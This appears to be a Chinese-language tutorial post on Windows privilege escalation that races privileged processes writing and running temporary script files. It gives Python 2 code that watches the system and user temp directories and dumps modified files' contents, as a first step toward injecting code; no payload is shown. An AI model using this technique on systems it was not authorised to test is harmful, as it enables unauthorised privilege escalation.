提权为什么需要监视临时文件的变化?
这是因为有些进程会产生一些临时文件,并执行临时文件中的代码。等到临时文件执行完毕后,再删除它。
我们的思路是,在文件创建后,和目标程序执行脚本的竞争中占先。即在临时文件被执行前,插入代码。
主要监听两个临时目录。开启两个线程监听两个目录。(为什么这里开线程,因为像这种阻塞型的监听程序,开线程才能同时监听两个,否则。。。。。一个会一直被另外一个阻塞,具体的你懂的)
思路:
CreateFile()
ReadDirectorChangesW()
for action,file_name in results:
如果action == FILE_CREATED:
创建文件+文件名
如果action == FILE_DELETED:
import win32file import tempfile import threading import os import win32con dir_minitor=["C:\\Windows\\Temp",tempfile.gettempdir()] FILE_CREATED =1 FILE_DELETED =2 FILE_MODIFIED = 3 FILE_RENAMED_FROM=4 FILE_RENAMED_TO = 5 def startMimitor(dir): FILE_LIST_DIRECTORY=0x0001 dir_director=win32file.CreateFile( dir, FILE_LIST_DIRECTORY, win32con.FILE_SHARE_READ|win32con.FILE_SHARE_WRITE|win32con.FILE_SHARE_DELETE, None, win32con.OPEN_EXISTING, win32con.FILE_FLAG_BACKUP_SEMANTICS, None ) while 1: try: results=win32file.ReadDirectoryChangesW( dir_director, 1024, True, win32con.FILE_NOTIFY_CHANGE_DIR_NAME|win32con.FILE_NOTIFY_CHANGE_FILE_NAME|win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES|win32con.FILE_NOTIFY_CHANGE_SIZE|win32con.FILE_NOTIFY_CHANGE_LAST_WRITE|win32con.FILE_NOTIFY_CHANGE_SECURITY, None, None ) for action,file_name in results: full_filename=os.path.join(dir,file_name) if action==FILE_CREATED: print "[*] Created %s"%full_filename elif action==FILE_DELETED: print "[-] Deleted %s"%full_filename elif action==FILE_MODIFIED: print "[*] Modified %s"%full_filename print "[vvv] Dumping contents ...." try: fd = open(full_filename,"rb") contents=fd.read() fd.close() print contents print "[^^^] Dump complete." except: print "[!!!] Failed" elif action==FILE_RENAMED_FROM: print "[>] Renamed from :%s"%full_filename elif action==FILE_RENAMED_TO: print "[<] Renamed to %s"%full_filename else: print "[???] Unknown:%s"%full_filename except: pass for path in dir_minitor: monitor_thread = threading.Thread(target=startMimitor,args=(path,)) print "Spawning monitoring thread for path:%s"%path monitor_thread.start()
运行截图: